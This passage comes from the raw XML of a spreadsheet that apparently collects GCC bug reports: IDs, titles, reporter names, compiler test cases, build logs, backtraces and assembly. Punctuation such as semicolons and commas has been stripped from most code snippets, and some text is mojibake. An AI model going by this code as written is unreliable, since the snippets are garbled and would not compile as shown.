Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 6.0.0 20150715 (experimental) [trunk revision 225804] (GCC) 
$ 
$ gcc-trunk -O1 small.c ./a.out
$ gcc-5.1 -Os small.c ./a.out
$ 
$ gcc-trunk -Os small.c
$ ./a.out
Floating point exception (core dumped)
$ 
---------------------------------
short a b
int
main ()
{
  for ( a != 1 a += 3)
    {
      int c = 0
      for ( c &lt; 2 c++)
	if (a)
	  {
	    char d = a
	    b = d ? 1 / d : 0 
	  }
	else
	  break
    }
  return 0
}</t>
  </si>
  <si>
    <t>GCC-65667</t>
  </si>
  <si>
    <t>[5 Regression] FAIL: g++.dg/cpp0x/pr57101.C  -std=gnu++11 (test for excess errors)</t>
  </si>
  <si>
    <t>spawn /home/dave/gnu/gcc/objdir/gcc/testsuite/g++/../../xg++ -B/home/dave/gnu/gc
c/objdir/gcc/testsuite/g++/../../ /home/dave/gnu/gcc/gcc/gcc/testsuite/g++.dg/cpp0x/pr57101.C -fno-diagnostics-show-caret -fdiagnostics-color=never -nostdinc++ 
-I/home/dave/gnu/gcc/objdir/hppa-linux-gnu/libstdc++-v3/include/hppa-linux-gnu -
I/home/dave/gnu/gcc/objdir/hppa-linux-gnu/libstdc++-v3/include -I/home/dave/gnu/
gcc/gcc/libstdc++-v3/libsupc++ -I/home/dave/gnu/gcc/gcc/libstdc++-v3/include/bac
kward -I/home/dave/gnu/gcc/gcc/libstdc++-v3/testsuite/util -fmessage-length=0 -std=gnu++11 -fcompare-debug -S -o pr57101.s/home/dave/gnu/gcc/gcc/gcc/testsuite/g++.dg/cpp0x/pr57101.C:171:31: fatal error: definition of std::initializer_list does not match #include compilation terminated.compiler exited with status 1output is:/home/dave/gnu/gcc/gcc/gcc/testsuite/g++.dg/cpp0x/pr57101.C:171:31: fatal error: definition of std::initializer_list does not match #include 
compilation terminated.FAIL: g++.dg/cpp0x/pr57101.C  -std=gnu++11 (test for excess errors)Excess errors:/home/dave/gnu/gcc/gcc/gcc/testsuite/g++.dg/cpp0x/pr57101.C:171:31: fatal error: definition of std::initializer_list does not match #include compilation terminated.
Similar fail:
FAIL: g++.dg/cpp0x/pr57101.C  -std=gnu++14 (test for excess errors)</t>
  </si>
  <si>
    <t>GCC-44758</t>
  </si>
  <si>
    <t>frv.md: incompatible enum comparisons / return</t>
  </si>
  <si>
    <t>echo timestamp &gt; s-attrtab
gcc -c   -g -O2 -DIN_GCC -DCROSS_DIRECTORY_STRUCTURE  -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -Wold-style-definition -Wc++-compat -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../../gcc/gcc -I../../../gcc/gcc/. -I../../../gcc/gcc/../include -I../../../gcc/gcc/../libcpp/include  -I../../../gcc/gcc/../libdecnumber -I../../../gcc/gcc/../libdecnumber/dpd -I../libdecnumber  -DCLOOG_PPL_BACKEND  -I/usr/include/libelf  insn-attrtab.c -o insn-attrtab.o
../../../gcc/gcc/config/frv/frv.md: In function â€˜bypass_pâ€™:
../../../gcc/gcc/config/frv/frv.md:348:17: error: comparison between â€˜frv_cpu_tâ€™ and â€˜enum attr_cpuâ€™ [-Werror=enum-compare]
../../../gcc/gcc/config/frv/frv.md:348:17: error: comparison between â€˜frv_cpu_tâ€™ and â€˜enum attr_cpuâ€™ [-Werror=enum-compare]
...
../../../gcc/gcc/config/frv/frv.md: In function â€˜insn_default_latencyâ€™:
../../../gcc/gcc/config/frv/frv.md:348:17: error: comparison between â€˜frv_cpu_tâ€™
 and â€˜enum attr_cpuâ€™ [-Werror=enum-compare]
...
../../../gcc/gcc/config/frv/frv.md: In function â€˜internal_dfa_insn_codeâ€™:
../../../gcc/gcc/config/frv/frv.md:348:17: error: comparison between â€˜frv_cpu_tâ€™ and â€˜enum attr_cpuâ€™ [-Werror=enum-compare]
...
... message repease for more than 2000 lines...
../../../gcc/gcc/config/frv/frv.md:348:17: error: comparison between â€˜frv_cpu_tâ€™ and â€˜enum attr_cpuâ€™ [-Werror=enum-compare]
../../../gcc/gcc/config/frv/frv.md:348:17: error: comparison between â€˜frv_cpu_tâ€™ and â€˜enum attr_cpuâ€™ [-Werror=enum-compare]
../../../gcc/gcc/config/frv/frv.md: In function â€˜get_attr_acc_groupâ€™:
../../../gcc/gcc/config/frv/frv.md:363:1: error: enum conversion in return is invalid in C++ [-Werror=c++-compat]
cc1: all warnings being treated as errors
make[1]: *** [insn-attrtab.o] Error 1
make[1]: Leaving directory `/user/inria/fsf/multi/frv-elf/gcc'
make: *** [all-gcc] Error 2</t>
  </si>
  <si>
    <t>GCC-15567</t>
  </si>
  <si>
    <t>[4.0 Regression] IRIX 5.3 bootstrap failure with native as</t>
  </si>
  <si>
    <t>Bootstrapping current mainline on IRIX 5.3 with the native as fails with
comparison failures after stage3.
This is due to the following patch:
2004-03-15  Nathanael Nerode  
	* Makefile.tpl: Introduce experimental top level bootstrap support.
	* Makefile.in: Regenerate.
	* configure.in: Introduce support for top level bootstrap.
	* configure: Regenerate.
The patch passes BOOT_CFLAGS in from the toplevel so the alternative
setting in the tmake_file (config/mips/t-iris5-as) which is necessary to
get a clean bootstrap in this configuration has no effect.
Environment:
System: IRIX lyra 5.3 11091812 IP22 mips
host: mips-sgi-irix5.3
build: mips-sgi-irix5.3
target: mips-sgi-irix5.3
configured with: /vol/gnu/src/gcc/gcc-dist/configure --prefix=/vol/gcc --with-local-prefix=/vol/gcc --disable-nls
How-To-Repeat:
Bootstrap current mainline as described above.</t>
  </si>
  <si>
    <t>GCC-34601</t>
  </si>
  <si>
    <t>[4.3 regression] ICE with undefined enum</t>
  </si>
  <si>
    <t>The following invalid testcase triggers an ICE on mainline:
====================
void foo()
{
  enum E e
}
====================
bug.c: In function 'foo':
bug.c:3: error: storage size of 'e' isn't known
bug.c:2: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in set_reg_attrs_for_decl_rtl at emit-rtl.c:1009
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-20763</t>
  </si>
  <si>
    <t>[4.0/4.1 regression] Incompatible struct alignment change</t>
  </si>
  <si>
    <t>C++ structure layout has changed and is now incompatible between C++ and Java
and between older releases of C++.
Structure layout is also incompatible with C.
This is an ABI breaking bug.
See the discussion beginning at
http://gcc.gnu.org/ml/gcc/2005-04/msg00139.html
and the testcase at http://gcc.gnu.org/ml/gcc/2005-04/msg00152.html</t>
  </si>
  <si>
    <t>GCC-79043</t>
  </si>
  <si>
    <t>Wrong code with optimize((-fno-strict-aliasing)) and always_inline</t>
  </si>
  <si>
    <t>Following code does not respect -no-strict-aliasing:
$ cat ./gcc/testsuite/gcc.c-torture/execute/alias-2.c
int val
int *ptr = 
float *ptr2 = 
static
__attribute__((always_inline optimize (-fno-strict-aliasing)))
typepun ()
{
  *ptr2=0
}
main()
{
  *ptr=1
  typepun ()
  if (*ptr)
    __builtin_abort ()
}
$ gcc -O2 ./gcc/testsuite/gcc.c-torture/execute/alias-2.c &amp;&amp; ./a.out
Aborted (core dumped)
Discussed in: https://gcc.gnu.org/ml/gcc/2017-01/msg00059.html
I'm testing patch for that.</t>
  </si>
  <si>
    <t>GCC-4085</t>
  </si>
  <si>
    <t>PPC -fPIC code generation problem</t>
  </si>
  <si>
    <t>The following (admittedly bogus) code does not link on ppc Linux.
$ gcc -O2 -fPIC -o ppcbug ppcbug.c
/tmp/ccCbVD67.o(.rodata+0x10): undefined reference to `.L23'
/tmp/ccCbVD67.o(.rodata+0x14): undefined reference to `.L23'
/tmp/ccCbVD67.o(.rodata+0x18): undefined reference to `.L23'
/tmp/ccCbVD67.o(.rodata+0x1c): undefined reference to `.L23'
/tmp/ccCbVD67.o(.rodata+0x20): undefined reference to `.L22'
collect2: ld returned 1 exit status
It looks like gcc is creating a jump table for the switch.  It's
realizing that it can optimize away all cases except for default but
references to the deleted code are left arount in the jump table.
#include 
int main (int argc char *argv[])
{
  char *foo 
  switch (argc) 
    {
    case 1:
      foo = one
    case 2:
      foo = two
    case 3:
      foo = three
    case 4:
      foo = four
    case 5:
      foo = five
    default:
      foo = default
    }
  puts (foo)
  return 0
}
Release:
3.1 20010811 (experimental)
Environment:
System: Linux peach.cygnus.co.uk 2.2.17pre20-ben3 #2 Wed Sep 6 01:14:01 CEST 2000 ppc unknown
Architecture: ppc
host: powerpc-unknown-linux-gnu
build: powerpc-unknown-linux-gnu
target: powerpc-unknown-linux-gnu
configured with: /peach/green/net/trunk/gcc/configure --prefix=/peach/green/net/trunk/i --enable-threads --enable-language=cc++java --enable-languages=cc++java --disable-multilibs --disable-multilib : (reconfigured)  : (reconfigured)  : (reconfigured)  : (reconfigured)
How-To-Repeat:
	Try compiling the code above with -O2 -fPIC.</t>
  </si>
  <si>
    <t>GCC-65427</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE in emit_move_insn with wide vector types</t>
  </si>
  <si>
    <t>Created attachment 35037
testcase
GCC 4.7.0 through at least 4.9.2 and 5.0 20150215 snapshot (I haven't tested newer ones) fails with ICE when compiling the attached md5slice.c testcase on and for Linux x86_64:
$ gcc md5slice.c -o md5slice -O2 -DVECTOR -Wno-attributes -ftree-loop-vectorize
md5slice.c: In function 'GG':
md5slice.c:302:27: internal compiler error: in emit_move_insn at expr.c:3609
 static MAYBE_INLINE3 void GG(a b c d x s ac)
                           ^
0x6974d2 emit_move_insn(rtx_def* rtx_def*)
        ../../gcc/expr.c:3608
0x5e5294 expand_gimple_stmt_1
        ../../gcc/cfgexpand.c:3288
0x5e5294 expand_gimple_stmt
        ../../gcc/cfgexpand.c:3322
0x5e589b expand_gimple_basic_block
        ../../gcc/cfgexpand.c:5162
0x5e7b56 gimple_expand_cfg
        ../../gcc/cfgexpand.c:5741
0x5e7b56 execute
        ../../gcc/cfgexpand.c:5961
Without -ftree-loop-vectorize compilation succeeds.  With -O3 it fails slightly differently:
$ gcc md5slice.c -o md5slice -O3 -DVECTOR -Wno-attributes 
md5slice.c: In function 'II.constprop':
md5slice.c:328:27: internal compiler error: in emit_move_insn at expr.c:3609
 static MAYBE_INLINE3 void II(a b c d x s ac)
                           ^
0x6974d2 emit_move_insn(rtx_def* rtx_def*)
        ../../gcc/expr.c:3608
0x5e5294 expand_gimple_stmt_1
        ../../gcc/cfgexpand.c:3288
0x5e5294 expand_gimple_stmt
        ../../gcc/cfgexpand.c:3322
0x5e589b expand_gimple_basic_block
        ../../gcc/cfgexpand.c:5162
0x5e7b56 gimple_expand_cfg
        ../../gcc/cfgexpand.c:5741
0x5e7b56 execute
        ../../gcc/cfgexpand.c:5961
With -mavx or -mavx2 it succeeds (despite of -O3).
GCC 4.7.0 does not have the -ftree-loop-vectorize option but a similar problem is seen with -O3:
$ gcc md5slice.c -o md5slice -O3 -DVECTOR -Wno-attributes
md5slice.c: In function 'GG':
md5slice.c:302:27: internal compiler error: in emit_move_insn at expr.c:3435
So far all of this is with:
typedef element vector __attribute__ ((vector_size (32)))
on line 41.  Reducing the vector width to 16 makes the plain SSE2 compilation succeed with any optimizations.  Conversely increasing the vector width to 64 makes compilation to fail even with AVX/AVX2 enabled.
Ideally when the vector type width is in excess of the current target architecture's native SIMD vector width GCC should transparently split it into multiple sub-vectors of the natively supported width.  This is useful not only for being able to build/use wider-vector source code for/on older CPUs but also to hide instruction latencies by having the compiler interleave operations on the sub-vectors due to the extra parallelism the excessive vector width provides.  For example once this is supported 32 could actually work faster than 16 on SSE2 and 64 faster than 32 on AVX2 for some applications (as long as the register pressure does not become too high).
Failing that at least the compiler should report that this is unsupported rather than fail with an ICE.
With GCC 4.6.2 and older the ICE does not occur for the rather unfortunate reason that (at least for me) these versions generate scalar code (so ~10x slower) when the type's vector width exceeds what's supported natively.</t>
  </si>
  <si>
    <t>solar-gcc</t>
  </si>
  <si>
    <t>GCC-68405</t>
  </si>
  <si>
    <t>trunk/gcc/config/i386/i386.c:22951: possible missing break ?</t>
  </si>
  <si>
    <t>[trunk/gcc/config/i386/i386.c:22951] -&gt; [trunk/gcc/config/i386/i386.c:22953]: (warning) Variable 'unspec_code' is reassigned a value before the old one has been used. 'break' missing?
Source code is
  switch (code)
    {
    case LEU:
    case GTU:
    case GEU:
    case LTU:
      unspec_code = UNSPEC_UNSIGNED_PCMP
    default:
      unspec_code = UNSPEC_PCMP
    }</t>
  </si>
  <si>
    <t>GCC-59124</t>
  </si>
  <si>
    <t>[6 Regression] Wrong warnings array subscript is above array bounds</t>
  </si>
  <si>
    <t>$ gcc -S -Wall -O3 1.c
1.c: In function 'foo':
1.c:12:23: warning: array subscript is above array bounds [-Warray-bounds]
       bar[j - 1] = baz[j - 1]
                       ^
1.c:12:23: warning: array subscript is above array bounds [-Warray-bounds]
=============== 8&lt; ===============
unsigned baz[6]
void foo(unsigned *bar unsigned n)
{
  unsigned i j
  if (n &gt; 6)
    n = 6
  for (i = 1 i &lt; n i++)
    for (j = i - 1 j &gt; 0 j--)
      bar[j - 1] = baz[j - 1]
}
=============== &gt;8 ===============
GCC 4.8.0 20120902 /rev. 190863/ - works
GCC 4.8.0 20121111 /rev. 193417/ - fails.</t>
  </si>
  <si>
    <t>GCC-52906</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: SIGSEGV in check_tag_decl (decl.c:4230) with __attribute__ ((__deprecated__)) alone</t>
  </si>
  <si>
    <t>===== testcase.C =====
__attribute__ ((__deprecated__))
======================
Compiler output:
$ gcc testcase.C
testcase.C:1:32: error: declaration does not declare anything [-fpermissive]
==17107== Invalid read of size 2
==17107==    at 0x5B73C5: check_tag_decl(cp_decl_specifier_seq*) (decl.c:4230)
==17107==    by 0x5D7C3D: shadow_tag(cp_decl_specifier_seq*) (decl.c:4263)
==17107==    by 0x69DE3C: cp_parser_simple_declaration(cp_parser* bool tree_node**) (parser.c:10493)
==17107==    by 0x6A40B7: cp_parser_block_declaration(cp_parser* bool) (parser.c:10304)
==17107==    by 0x6A932B: cp_parser_declaration(cp_parser*) (parser.c:10200)
==17107==    by 0x6A7F37: cp_parser_declaration_seq_opt(cp_parser*) (parser.c:10086)
==17107==    by 0x6A98A2: c_parse_file() (parser.c:3797)
==17107==    by 0x7A8664: c_common_parse_file() (c-opts.c:1124)
==17107==    by 0xB8AB0F: toplev_main(int char**) (toplev.c:556)
==17107==    by 0x66E009C: (below main) (in /lib64/libc-2.13.so)
==17107==  Address 0x0 is not stack'd malloc'd or (recently) free'd
==17107== 
testcase.C:1:32: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The code is accepted with -fpermissive (but still ICEs) so I am not sure if this should be marked as ICE on valid or invalid.
Tested revisions:
r186200 - crash
4.7 r185191 - crash
4.6 r185191 - OK</t>
  </si>
  <si>
    <t>GCC-60454</t>
  </si>
  <si>
    <t>[4.7 Regression] Code mistakenly detected as doing bswap</t>
  </si>
  <si>
    <t>Created attachment 32296
Testcase for bswap incorrect detection
Optimization pass optimize_bswap in tree-ssa-math-opts.c incorrectly detect a bswap being performed in certain cases leading to wrong code being generated.
Please find attached a testcase that exhibit the problem. Compile with trunk gcc with gcc -O2 -fdump-tree-bswap -c testcase.c and observe that testcase.c.*bswap contains the string 32 bit bswap implementation found at while the code does not perform a byte swap. This test was tried on an Ubuntu 13.10 (saucy) with 4.8.1 and trunk gcc.
gcc 4.8.1 was configured with:
../src/configure -v --with-pkgversion='Ubuntu/Linaro 4.8.1-10ubuntu9' --with-bugurl=file:///usr/share/doc/gcc-4.8/README.Bugs --enable-languages=cc++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-4.8 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.8 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.8-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
while trunk gcc was configured with:
../src/configure --prefix=../install --target=arm-none-eabi --enable-languages=cc++ --with-mode=thumb --with-cpu=cortex-m3 --with-newlib --with-headers=../src/newlib/libc/include --enable-newlib-register-fini --disable-newlib-supplied-syscalls --disable-multilib --with-libexpat --with-system-zlib --disable-gdbtk --enable-plugins --disable-libgomp --disable-libmudflap --disable-libquadmath --disable-libssp --disable-libstdcxx-pch --disable-nls --disable-rda --disable-sid --disable-tui --disable-utils --disable-werror --disable-fixed-point
I'm currently cleaning a patch to solve this issue.
Best regards.</t>
  </si>
  <si>
    <t>GCC-81346</t>
  </si>
  <si>
    <t>Missed constant propagation into comparison</t>
  </si>
  <si>
    <t>Created attachment 41694
Input C file for triggering the issue
The attached C file contains the following function:
int fn1(int p1) {
  int b = (p1 / 12 == 6)
  return b
}
As these are integers the expression (p1 / 12 == 6) can be optimized to a subtraction and an unsigned compare. GCC can do this (here for ARM):
fn1:
	sub	r0 r0 #72
	cmp	r0 #11
	movhi	r0 #0
	movls	r0 #1
	bx	lr
The attached file also contains the following function:
int fn2(int p1) {
  int a = 6
  int b = (p1 / 12 == a)
  return b
}
This is equivalent to the above code the value of a can only ever be 6. Consequently the output machine code should be equivalent. However GCC does not recognize the above pattern and generates more complex code:
fn2: 
	movw	r3 #43691
	movt	r3 10922
	smull	r2 r3 r3 r0
	asr	r0 r0 #31
	rsb	r0 r0 r3 asr #1
	sub	r0 r0 #6
	clz	r0 r0
	lsr	r0 r0 #5
	bx	lr
I believe this is a target-independent optimization issue because x86-64 and PowerPC behave analogously for example (x86-64):
fn1:
	subl	$72 %edi
	xorl	%eax %eax
	cmpl	$11 %edi
	setbe	%al
	ret
fn2:
	movl	%edi %eax
	movl	$715827883 %edx
	sarl	$31 %edi
	imull	%edx
	xorl	%eax %eax
	sarl	%edx
	subl	%edi %edx
	cmpl	$6 %edx
	sete	%al
	ret
Version:
gcc version 8.0.0 20170706 (experimental) (GCC)
Configured with: --target=armv7a-eabihf --with-arch=armv7-a --with-fpu=vfpv3-d16 --with-float-abi=hard --with-float=hard
or
with: --target=x86_64-pc-linux-gnu
or
with: --target=ppc-eabi</t>
  </si>
  <si>
    <t>gergo</t>
  </si>
  <si>
    <t>GCC-58063</t>
  </si>
  <si>
    <t>default arguments evaluated twice per call</t>
  </si>
  <si>
    <t>% cat try.cc
#include 
void f(bool x = !(std::cout &lt;&lt; hi!\n)) {
    std::cout &lt;&lt; x &lt;&lt; '\n'
}
int main() {
    f()
}
% g++ try.cc
% ./a.out 
hi!
hi!
0
My question: Why is the default argument evaluated twice for each call to f()?
Is this allowed by the standard or a bug in g++?
% g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/home/mauke/usr/local/libexec/gcc/i686-pc-linux-gnu/4.8.1/lto-wrapper
Target: i686-pc-linux-gnu
Configured with: ../gcc-4.8.1/configure --prefix=/home/mauke/usr/local --with-arch=native --with-tune=native --enable-__cxa_atexit --enable-languages=cc++go --disable-nls
Thread model: posix
gcc version 4.8.1 (GCC)</t>
  </si>
  <si>
    <t>plokinom</t>
  </si>
  <si>
    <t>GCC-55831</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE: verify_flow_info failed</t>
  </si>
  <si>
    <t>Hello ! The following testcase makes GCC as of 20121231 ICE with -O -fstrict-overflow -ftree-vectorize.
$ cat flow.c
int g
void f(void)
{
    short a b i
    if(a)
    {
label:
        for(i = 0 i &lt; 8 i++)
            b ^= a++
        if(!b)
            g = 0
    }
}
$ xgcc -O -fstrict-overflow -ftree-vectorize flow.c
flow.c: In function â€˜fâ€™:
flow.c:3:6: error: label 
 void f(void)
      ^
label in the middle of basic block 4flow.c:3:6: internal compiler error:
verify_flow_info failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-5570</t>
  </si>
  <si>
    <t>wrong code generated for asm statements 3.0.3</t>
  </si>
  <si>
    <t>gcc 3.0.3 produces invalid code for asm statements
found in glibc-2.2.5. 
 .L156:
         lea (-64%a6)%a3
         move.l %a3%d0
         move.l %d5%d3
         moveq.l #106%d5 &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
 #APP
         trap #0
 #NO_APP
Release:
unknown
Environment:
linux-m68k
How-To-Repeat:
gcc -O3 -S xx.i</t>
  </si>
  <si>
    <t>richard.zidlicky</t>
  </si>
  <si>
    <t>GCC-77526</t>
  </si>
  <si>
    <t>[7 Regression] ICE: in verify_dominators at dominance.c:1039 with -mstringop-strategy=byte_loop</t>
  </si>
  <si>
    <t>Created attachment 39583
reduced testcase
Compiler output:
$ x86_64-pc-linux-gnu-gcc -Os -fno-forward-propagate -fno-gcse -fno-rerun-cse-after-loop -mstringop-strategy=byte_loop testcase.c -Wno-psabi
testcase.c: In function 'foo':
testcase.c:9:1: error: dominator of 5 should be 4 not 2
 }
 ^
testcase.c:9:1: internal compiler error: in verify_dominators at dominance.c:1039
0x7bd965 verify_dominators(cdi_direction)
        /repo/gcc-trunk/gcc/dominance.c:1039
0x7bdb8f checking_verify_dominators
        /repo/gcc-trunk/gcc/dominance.h:71
0x7bdb8f calculate_dominance_info(cdi_direction)
        /repo/gcc-trunk/gcc/dominance.c:664
0x74acdd flow_loops_find(loops*)
        /repo/gcc-trunk/gcc/cfgloop.c:419
0x9ff122 loop_optimizer_init(unsigned int)
        /repo/gcc-trunk/gcc/loop-init.c:93
0x14dd398 if_convert
        /repo/gcc-trunk/gcc/ifcvt.c:5407
0x14df20d execute
        /repo/gcc-trunk/gcc/ifcvt.c:5628
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ x86_64-pc-linux-gnu-gcc -v
Using built-in specs.
COLLECT_GCC=/repo/gcc-trunk/binary-latest-amd64/bin/x86_64-pc-linux-gnu-gcc
COLLECT_LTO_WRAPPER=/repo/gcc-trunk/binary-trunk-240036-checking-yes-rtl-df-extra-nographite-amd64/bin/../libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /repo/gcc-trunk//configure --enable-languages=cc++ --enable-valgrind-annotations --disable-nls --enable-checking=yesrtldfextra --without-cloog --without-ppl --without-isl --build=x86_64-pc-linux-gnu --host=x86_64-pc-linux-gnu --target=x86_64-pc-linux-gnu --with-ld=/usr/bin/x86_64-pc-linux-gnu-ld --with-as=/usr/bin/x86_64-pc-linux-gnu-as --disable-libstdcxx-pch --prefix=/repo/gcc-trunk//binary-trunk-240036-checking-yes-rtl-df-extra-nographite-amd64
Thread model: posix
gcc version 7.0.0 20160908 (experimental) (GCC) 
Tested revisions:
r240036 - ICE
6-branch r239849 - OK</t>
  </si>
  <si>
    <t>GCC-54300</t>
  </si>
  <si>
    <t>[4.7 4.8 Regression] regcprop incorrectly looks through parallel register swap operation</t>
  </si>
  <si>
    <t>Created attachment 28044
Small repro case
Using gcc trunk at rev 190381 compiled with the Android NDK r8b build-gcc.sh
script (so an arm-linux-androideabi target) and the command line below the
attached repro case generates wrong code:
arm-linux-androideabi-g++ -march=armv7-a -mfloat-abi=softfp -mfpu=vfp -mfpu=neon -marm -O2 test.cpp -S -o test.s
The core loop is pasted below:
	for(unsigned int sv=0  sv!=dv0  sv=(sv+s1v)&amp;smask_v)
	{
		int32x4_t s
		s = vmovl_s16(vget_low_s16(_loadlo_8i16((cv8i16*)_Inp sv )))
		c = vaddq_s32(c s)
	}
8 bytes are fetched from _Inp (in bytes) + sv then sign-extended from 4 16bits values to 4 32bits values then accumulated in c.
The generated assembly code for the loop is:
.L3:
	add	r4 r0 ip
	vmov.i32	d18 #0  @ v4hi   &lt;= d18 is full of 0's
	add	ip ip r2
	vld1.16	{d19} [r4:64]            &lt;= d19 holds useful data
	and	ip ip r5
	cmp	r3 ip
	vswp	d18 d19                  &lt;= d19 is now full of 0's
	vmovl.s16	q9 d19           &lt;= d19 (full of 0's) gets expanded
	vadd.i32	q8 q8 q9        &lt;= q9 is always zero when accumulated
	bne	.L3
When using -O1 or -O2 -fno-gcse correct code is generated:
.L3:
	add	r4 r0 ip
	add	ip ip r2
	and	ip ip r5
	vld1.16	{d18} [r4:64]            &lt;= d18 holds useful data
	cmp	r3 ip
	vmovl.s16	q9 d18           &lt;= d18 is sign-extended
	vadd.i32	q8 q8 q9        &lt;= q9 is accumulated
	bne	.L3
This also happens with gcc 4.7.1 but not with gcc 4.6
Also in the loadlo_8i16 function if we replace the call to zero_64 by the proper vdup_n_s16(0) then correct code is generated at -O2.
The (stripped down in the repro case) _v16u8_ and _v8u8_ structures are the way we implemented some kind of compiler-performed polymorphism for Neon variables since not all ARM compilers have -flax-vector-conversions.</t>
  </si>
  <si>
    <t>eric.batut</t>
  </si>
  <si>
    <t>GCC-10124</t>
  </si>
  <si>
    <t>unsubscribe</t>
  </si>
  <si>
    <t xml:space="preserve"> unsubscribe
Release:
unknown</t>
  </si>
  <si>
    <t>cadd</t>
  </si>
  <si>
    <t>GCC-69053</t>
  </si>
  <si>
    <t>[6 Regression] ICE in build_vector_from_val</t>
  </si>
  <si>
    <t>Starting with r230423 the following testcase causes an ICE:
$ cat genattrtab.cc 
struct A {
  int *elem[1]
}
int a d e
A *b
int *c
int main()
{
  int *f = 0
  for ( e e++)
    if (b-&gt;elem[e])
      f = c
  if (f)
    a = d
}
$ cc1plus -march=core-avx2 -quiet -O3 genattrtab.cc
genattrtab.cc: In function 'int main()':
genattrtab.cc:7:5: internal compiler error: in build_vector_from_val at tree.c:1754
 int main()
     ^~~~
0xf62595 build_vector_from_val(tree_node* tree_node*)
        /home/miyuki/gcc/src/gcc/tree.c:1753
0xf0c94a get_initial_def_for_reduction(gimple* tree_node* tree_node**)
        /home/miyuki/gcc/src/gcc/tree-vect-loop.c:4120
0x5b809a vect_create_epilog_for_reduction
        /home/miyuki/gcc/src/gcc/tree-vect-loop.c:4283
0xf0e65d vectorizable_reduction(gimple* gimple_stmt_iterator* gimple** _slp_tree*)
        /home/miyuki/gcc/src/gcc/tree-vect-loop.c:6100
0xf05e30 vect_transform_stmt(gimple* gimple_stmt_iterator* bool* _slp_tree* _slp_instance*)
        /home/miyuki/gcc/src/gcc/tree-vect-stmts.c:8048
0xf0be72 vect_transform_loop(_loop_vec_info*)
        /home/miyuki/gcc/src/gcc/tree-vect-loop.c:6793
0xf27537 vectorize_loops()
        /home/miyuki/gcc/src/gcc/tree-vectorizer.c:548
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-1994</t>
  </si>
  <si>
    <t>gcc 2.96 optimisation bug</t>
  </si>
  <si>
    <t>See attached file (swapfloat.c) for complete documentation
and example.
Release:
gcc version 2.96 20000731 (Red Hat Linux 7.0)
Environment:
Red Hat Linux 7.0 i386
How-To-Repeat:
See attached file (swapfloat.c) for complete documentation
and example.</t>
  </si>
  <si>
    <t>ben.caradoc-davies</t>
  </si>
  <si>
    <t>GCC-25061</t>
  </si>
  <si>
    <t>procedure name conflict</t>
  </si>
  <si>
    <t>using GNU Fortran 95 (GCC) 4.1.0 20051126 (prerelease)  with '-g -pedantic -std=f95' I get a bad / no diagnostic for the following invalid code:
INTERFACE I1
 SUBROUTINE S1(I)
 END SUBROUTINE S1
 SUBROUTINE S2(R)
 END SUBROUTINE S2
END INTERFACE I1
CONTAINS
 SUBROUTINE I1(I)
 END SUBROUTINE I1
END</t>
  </si>
  <si>
    <t>GCC-19278</t>
  </si>
  <si>
    <t>failure in gcc.dg/sibcall-6.c with -fpic/-fPIC on i686-pc-linux-gnu</t>
  </si>
  <si>
    <t>When running the 3.4 or mainline testsuite with -fpic or -fPIC on i686-pc-linux-
gnu I get an extra failure in:
FAIL: gcc.dg/sibcall-6.c execution test
The problem is that the sibcall in question isn't getting optimized.  I tried 
adding static to foo and bar in the testcase but that didn't help.
Is there a way to rewrite the test such that it passes with -fpic/-fPIC or 
should the test be bypassed?</t>
  </si>
  <si>
    <t>GCC-3849</t>
  </si>
  <si>
    <t>g++-v3/bits/ostream.tcc:490: warning: declaration of `__fmt' shadows previous local</t>
  </si>
  <si>
    <t>g++-v3/bits/ostream.tcc:490: warning: declaration of `__fmt' shadows previous local
Release:
3.0
Environment:
System: Linux localhost.localdomain 2.4.7 #3 Mon Jul 23 23:04:53 CEST 2001 i586 unknown
Architecture: i586
host: i586-pc-linux-gnu
build: i586-pc-linux-gnu
target: i586-pc-linux-gnu
configured with: ../gcc-3.0/configure --prefix=/opt/gcc-3.0
How-To-Repeat:
compile this famous program:
#include 
using namespace std
int main()
{
  cout&lt;&lt;Hello world!&lt;&lt;endl
  return 0
}
with -Wshadow
[achim@localhost c++]$ g++ -Wshadow ostream_test.cc 
/opt/gcc-3.0/include/g++-v3/bits/ostream.tcc: In function `void 
   std::__pad_char(std::basic_ios&amp; _CharT* const _CharT* 
